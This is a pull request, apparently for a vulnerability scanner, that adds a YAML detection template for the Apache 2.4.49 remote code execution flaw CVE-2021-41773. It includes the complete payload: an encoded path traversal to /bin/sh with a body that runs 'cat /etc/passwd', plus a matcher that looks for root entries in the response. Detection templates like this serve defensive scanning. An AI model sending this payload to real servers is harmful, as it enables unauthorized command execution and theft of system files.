### PR TITLE
Apache rce CVE 2021 41773

### DIFF
--- a/pocs/apache-rce-cve-2021-41773.yml
+++ b/pocs/apache-rce-cve-2021-41773.yml
@@ -1,5 +1,5 @@
 name: poc-yaml-apache-rce-cve-2021-41773
-linux:
+rules:
   - method: POST
     path: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
     body: A=|echo;cat /etc/passwd

--- a/pocs/apache-rce-cve-2021-41773.yml
+++ b/pocs/apache-rce-cve-2021-41773.yml
@@ -1,0 +1,11 @@
+name: poc-yaml-apache-rce-cve-2021-41773
+linux:
+  - method: POST
+    path: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
+    body: A=|echo;cat /etc/passwd
+    expression: |
+      response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+detail:
+  author: B1anda0(https://github.com/B1anda0)
+  links:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-41773


### PR DESCRIPTION


## 本 poc 是检测什么漏洞的
apache2.4.49 rce
## 测试环境
fofa：apache 2.4.49
## 备注
![image](https://user-images.githubusercontent.com/74232513/136175906-f66e6c70-1519-4328-9843-52632b31d43f.png)
